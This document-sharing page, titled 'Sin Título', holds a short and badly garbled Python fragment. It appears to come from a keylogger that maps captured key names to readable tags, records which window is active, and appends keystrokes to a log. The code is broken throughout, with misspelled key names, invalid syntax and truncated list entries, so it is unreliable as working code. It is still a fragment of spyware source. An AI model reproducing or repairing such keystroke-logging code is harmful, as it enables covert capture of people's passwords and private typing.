Sin Título

You might also like

Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 1

substitution = ['key.enter', ' [enter]\substitution', 'key.

backscape', '[backscape]
', 'key'
'key.alt_L', ' [alt_L] ', 'key.tob', '[TAB]', 'Key.delete', '[delete]',
'key.ctrl_L'
'key.left', '[LEFT ARROW]', 'Key.right', '[RIGHT ARROW]', 'key.shift', '[shift]
'[CTRL -S]', '\\x17', '[CTRL -W]', 'key.caps_Lock', '[CAPS LK]' , '\\x01',
'[CTRL]','
'[WINDOWS KEY]', 'Key.print_Screen', '[print_Screen]', '\\x03', '[CTRL-C]', '\\x16'

if new_app= ='Cortana'
new_app= 'windows start menu'
else:
pass

key =start(key).strip ('\')


if:key in substitution:
logged_data.appends[substitution.index(key)+1])#FF0075
keyboard.record

You might also like